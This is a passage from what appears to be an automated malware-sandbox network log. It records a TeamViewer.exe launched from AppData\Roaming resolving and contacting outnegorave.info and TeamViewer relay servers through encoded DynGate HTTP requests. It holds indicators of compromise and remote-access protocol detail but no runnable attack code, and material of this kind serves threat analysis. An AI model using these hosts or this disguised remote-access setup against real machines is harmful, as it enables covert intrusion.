                                                                                                                      Sep 15, 2021 14:10:08.747288942 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.747579098 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.747689009 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:08.747903109 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:08.747915030 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:18.105488062 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:18.105592012 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:18.105611086 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:18.105655909 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:18.109507084 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:18.109616995 CEST44349839172.67.205.33192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:18.109668016 CEST49839443192.168.2.6172.67.205.33
                                                                                                                      Sep 15, 2021 14:10:33.281004906 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:10:33.281115055 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:10:33.281358957 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:10:33.360748053 CEST804975637.252.232.109192.168.2.6

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 15, 2021 14:07:55.339137077 CEST5838453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:55.366976023 CEST53583848.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:07:59.058855057 CEST6026153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:59.094980001 CEST53602618.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:07:59.112746000 CEST5606153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:07:59.150213003 CEST53560618.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:00.839952946 CEST5833653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:00.878603935 CEST53583368.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:03.412535906 CEST5378153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST53537818.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:14.876324892 CEST5406453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:14.906733036 CEST53540648.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:15.979767084 CEST5281153192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:16.009274006 CEST53528118.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:18.095195055 CEST5529953192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:18.122610092 CEST53552998.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:22.332706928 CEST6374553192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:22.384006977 CEST53637458.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:23.001681089 CEST5005553192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:23.072467089 CEST53500558.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:24.531429052 CEST6137453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:24.561456919 CEST53613748.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:24.859649897 CEST5033953192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:24.902987003 CEST53503398.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:25.034883976 CEST6330753192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:25.096126080 CEST53633078.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:26.477113962 CEST4969453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:26.555916071 CEST53496948.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:27.616777897 CEST5498253192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:27.647160053 CEST53549828.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:29.198575974 CEST5001053192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:29.230607986 CEST53500108.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:30.075391054 CEST6371853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:30.105350018 CEST53637188.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:31.662997007 CEST6211653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:31.703227997 CEST53621168.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:32.473421097 CEST6381653192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:32.503563881 CEST53638168.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:36.936897039 CEST5501453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:36.968677998 CEST53550148.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:52.816452980 CEST6220853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:08:52.857124090 CEST53622088.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:14.727735996 CEST5757453192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:09:14.763683081 CEST53575748.8.8.8192.168.2.6
                                                                                                                      Sep 15, 2021 14:09:16.474416018 CEST5181853192.168.2.68.8.8.8
                                                                                                                      Sep 15, 2021 14:09:16.509351969 CEST53518188.8.8.8192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Sep 15, 2021 14:07:59.058855057 CEST192.168.2.68.8.8.80x281Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:07:59.112746000 CEST192.168.2.68.8.8.80xa930Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:00.839952946 CEST192.168.2.68.8.8.80x6a24Standard query (0)master1.teamviewer.comA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.412535906 CEST192.168.2.68.8.8.80x66a0Standard query (0)outnegorave.infoA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Sep 15, 2021 14:07:59.094980001 CEST8.8.8.8192.168.2.60x281Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:07:59.150213003 CEST8.8.8.8192.168.2.60xa930Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:00.878603935 CEST8.8.8.8192.168.2.60x6a24No error (0)master1.teamviewer.com185.188.32.1A (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST8.8.8.8192.168.2.60x66a0No error (0)outnegorave.info172.67.205.33A (IP address)IN (0x0001)
                                                                                                                      Sep 15, 2021 14:08:03.445225954 CEST8.8.8.8192.168.2.60x66a0No error (0)outnegorave.info104.21.77.64A (IP address)IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • outnegorave.info
                                                                                                                      • master1.teamviewer.com
                                                                                                                      • 37.252.232.109

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649758172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649834172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.649839172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      3192.168.2.649752185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:00.918462038 CEST925OUTGET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:00.940159082 CEST925INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 36 35
                                                                                                                      Data Ascii: $32172965
                                                                                                                      Sep 15, 2021 14:08:00.958070040 CEST926OUTGET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:00.980880976 CEST926INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.008373976 CEST926OUTGET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.029356003 CEST926INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 16
                                                                                                                      Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 1b 99 19 1b 1b
                                                                                                                      Data Ascii: $


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      4192.168.2.649753185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.058862925 CEST927OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.080029964 CEST927INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 36 39
                                                                                                                      Data Ascii: $32172969
                                                                                                                      Sep 15, 2021 14:08:01.084237099 CEST928OUTGET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.105293989 CEST928INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.106717110 CEST928OUTGET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.128108978 CEST929INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 9
                                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                      Data Ascii: $ '


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      5192.168.2.649754185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.155966043 CEST929OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.179565907 CEST929INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 37 33
                                                                                                                      Data Ascii: $32172973
                                                                                                                      Sep 15, 2021 14:08:01.183722973 CEST930OUTGET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.204659939 CEST930INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.209389925 CEST931OUTGET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.230426073 CEST931INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 9
                                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                      Data Ascii: $ '


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      6192.168.2.649755185.188.32.180C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.259424925 CEST932OUTGET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.282213926 CEST932INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 10
                                                                                                                      Data Raw: 17 24 33 32 31 37 32 39 37 38
                                                                                                                      Data Ascii: $32172978
                                                                                                                      Sep 15, 2021 14:08:01.287225962 CEST932OUTGET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.309426069 CEST933INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:01.314114094 CEST933OUTGET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: master1.teamviewer.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.335100889 CEST934INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 443
                                                                                                                      Data Raw: 17 24 13 b6 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 9d 1c 18 2f 99 99 9b 1c 1c af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 98 af 98 9c 1a 97 18 9c 1c 17 19 99 17 18 af 98 2f 99 9c 98 98 1b 99 19 1b 1b af 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 99 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 96 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 9b 16 18 9c 1c 17 18 9b 99 17 18 9c 99 17 18 98 18 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 1b 16 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 9a 96 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 16 18 9c 1c 17 18 9b 99 17 19 1a 1b 17 18 9c 19 96 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9a 16 18 9c 1c 17 1b 1a 97 1b 9b 17 18 99 9c 16 18 9a 9c 97 1c 17 1c 1c 17 18 99 9c 16 18 9c 1c 17 18 9b 99 17 19 19 99 97 18 9b 9a 96 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9b 1a 16 19 9b 97 19 1a 99 17 19 1a 1b 17 18 98 19 16 19 18 9b 97 18 9a 1b 17 19 18 97 18 9a 18 16 1c 9a 17 18 9b 17 1b 17 18 9b 9a 96 18 9c 1c 17 18 9b 99 17 19 19 19 97 18 98 9b 96 19 18 99 97 19 19 1b 97 18 9c 1a 97 18 99 9c 96 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 9c 16 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 99 af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                                      Data Ascii: $ '////////13&6!


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      7192.168.2.64975637.252.232.10980C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.395808935 CEST934OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.435075998 CEST934INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 17
                                                                                                                      Data Raw: 17 24 66 61 73 74 31 32 38 35 32 34 30 38
                                                                                                                      Data Ascii: $fast12852408
                                                                                                                      Sep 15, 2021 14:08:01.542887926 CEST935INData Raw: 31
                                                                                                                      Data Ascii: 1
                                                                                                                      Sep 15, 2021 14:08:01.584625006 CEST935INData Raw: 32
                                                                                                                      Data Ascii: 2
                                                                                                                      Sep 15, 2021 14:08:01.627022028 CEST936INData Raw: 33
                                                                                                                      Data Ascii: 3
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST936OUTPOST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Content-Length: 500000
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.808274031 CEST936OUTData Raw: 17 24 10 04 00 85 a5 27 8b
                                                                                                                      Data Ascii: $'
                                                                                                                      Sep 15, 2021 14:08:02.336889029 CEST937OUTData Raw: 17 24 0a 20 00 05 a5 27 8b 88 13 80 00 00 00 00 00 01 00 00 00 11 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: $ '
                                                                                                                      Sep 15, 2021 14:08:02.336922884 CEST937OUTData Raw: 17 24 28 18 00 00 80 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: $(X
                                                                                                                      Sep 15, 2021 14:08:02.336926937 CEST937OUTData Raw: 17 24 2e 39 00 00 00 00 00 0b 4a 4f 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 03 01 04 00 00 00 01 00 00 00 03 04 00 00 00 0b 4a 4f 17 04 08 00 00 00 04 00 00 00 0b 4a 4f 17
                                                                                                                      Data Ascii: $.9JO#JOJO
                                                                                                                      Sep 15, 2021 14:08:02.731400013 CEST938OUTData Raw: 17 24 2e 78 00 00 00 00 00 0b 4a 4f 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 07 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 0b 4a 4f 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                                      Data Ascii: $.xJO&jaJO15.0.687 QSQS'
                                                                                                                      Sep 15, 2021 14:08:02.731461048 CEST938OUTData Raw: 17 24 2e 78 00 00 00 00 00 0b 4a 4f 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 01 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 0b 4a 4f 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                                      Data Ascii: $.xJO&jaJO15.0.687 QSQS'
                                                                                                                      Sep 15, 2021 14:08:02.731515884 CEST938OUTData Raw: 17 24 2e 78 00 00 00 00 00 0b 4a 4f 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 04 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 0b 4a 4f 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                                      Data Ascii: $.xJO&jaJO15.0.687 QSQS'
                                                                                                                      Sep 15, 2021 14:08:02.731573105 CEST938OUTData Raw: 17 24 2e 78 00 00 00 00 00 0b 4a 4f 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 05 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 0b 4a 4f 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                                      Data Ascii: $.xJO&jaJO15.0.687 QSQS'
                                                                                                                      Sep 15, 2021 14:08:28.282900095 CEST1452OUTData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:08:53.279131889 CEST5972OUTData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      8192.168.2.64975737.252.232.10980C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 15, 2021 14:08:01.495162010 CEST935OUTPOST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Content-Length: 3
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:01.495203018 CEST935OUTData Raw: 31
                                                                                                                      Data Ascii: 1
                                                                                                                      Sep 15, 2021 14:08:01.544800043 CEST935OUTData Raw: 32
                                                                                                                      Data Ascii: 2
                                                                                                                      Sep 15, 2021 14:08:01.587244987 CEST935OUTData Raw: 33
                                                                                                                      Data Ascii: 3
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST936INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-length: 0
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST937OUTGET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: 37.252.232.109
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST937INHTTP/1.1 200 OK
                                                                                                                      Pragma: no-cache
                                                                                                                      Cache-control: no-cache, no-store
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-length: 500000
